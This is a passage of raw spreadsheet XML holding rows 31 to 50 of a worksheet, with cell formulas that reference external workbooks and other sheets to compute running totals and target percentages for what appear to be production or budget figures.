      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]22'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]22'!$E$16</f>
        <v>2716</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'21'!H31</f>
        <v>102526</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1475533</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]22'!$I$16</f>
        <v>5158.44</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'21'!K31</f>
        <v>105569.9</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1461618.03</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]22'!$L$16</f>
        <v>62385.47</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>83.1806266666667</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'[11]22'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]22'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'21'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]22'!$I$13</f>
        <v>1799</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'21'!K32</f>
        <v>75387</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1096865</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]22'!$L$13</f>
        <v>70068.796</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>140.137592</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]22'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]22'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]22'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]22'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]22'!$U$76</f>
        <v>3.97727272727273e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]22'!$V$76</f>
        <v>4.10814606741573e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]22'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]22'!$R$76</f>
        <v>2.1e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]22'!$S$76</f>
        <v>3.51e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]22'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'21'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]22'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'21'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]22'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]22'!$W$77</f>
        <v>17.26</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]22'!$X$77</f>
        <v>17.31</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]22'!$Y$77</f>
        <v>19.76</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]22'!$T$77</f>
        <v>83.6666666667083</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]22'!$U$77</f>
        <v>6.10416666666856</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]22'!$V$77</f>
        <v>59.5979634831475</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]22'!$Q$77</f>
        <v>20.08000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]22'!$R$77</f>
        <v>32.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]22'!$S$77</f>
        <v>5092.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]22'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'21'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]22'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'21'!K34</f>
        <v>18055.71</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>485258.64</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]22'!$L$15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'[11]22'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'21'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]22'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'21'!K35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G36+'21'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'21'!K36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G37+'21'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'21'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]22'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]22'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]22'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'21'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]22'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'21'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]22'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'21'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'21'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]22'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]22'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]22'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'21'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]22'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'21'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]22'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'21'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'21'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]22'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]22'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]22'!$R$50</f>
        <v>545.82</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'21'!U39</f>
        <v>6994.52</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>85808.119</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]22'!$V$50</f>
        <v>378</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'21'!X39</f>
        <v>7022</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>85781</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]22'!$Y$50</f>
        <v>1204.066</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'21'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'21'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]22'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]22'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]22'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]22'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]22'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]22'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]22'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]22'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]22'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]22'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]22'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'21'!H41</f>
        <v>13016</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>137992</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]22'!$I$16</f>
        <v>1306.72</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'21'!K41</f>
        <v>18824.27</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>140217.81</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]22'!$L$16</f>
        <v>20321.49</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>67.7383</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]22'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]22'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]22'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'21'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]22'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'21'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]22'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]22'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]22'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'21'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]22'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'21'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]22'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]22'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]22'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]22'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'21'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]22'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'21'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]22'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]22'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]22'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'21'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]22'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'21'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]22'!$L$14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'[12]22'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'21'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]22'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'21'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]22'!$L$15</f>
        <v>57613.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]22'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]22'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]22'!$R$29</f>
        <v>173.9</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'21'!U44</f>
        <v>5430.9</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70184.068</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]22'!$V$29</f>
        <v>116</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'21'!X44</f>
        <v>3931</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>70341</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]22'!$Y$29</f>
        <v>3799.357</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]22'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'21'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]22'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'21'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]22'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]22'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]22'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]22'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]22'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]22'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]22'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]22'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]22'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'21'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'21'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]22'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]22'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]22'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'21'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]22'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'21'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]22'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'21'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'21'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]22'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]22'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]22'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'21'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]22'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'21'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]22'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'21'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'21'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]22'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]22'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]22'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'21'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]22'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'21'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]22'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'21'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'21'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]22'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]22'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]22'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'21'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]22'!$V$8</f>
        <v>613.21</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'21'!X49</f>
        <v>1657.53</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>178187.87</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]22'!$Y$8</f>
        <v>8936.09500000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'21'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'21'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]22'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]22'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]22'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'21'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
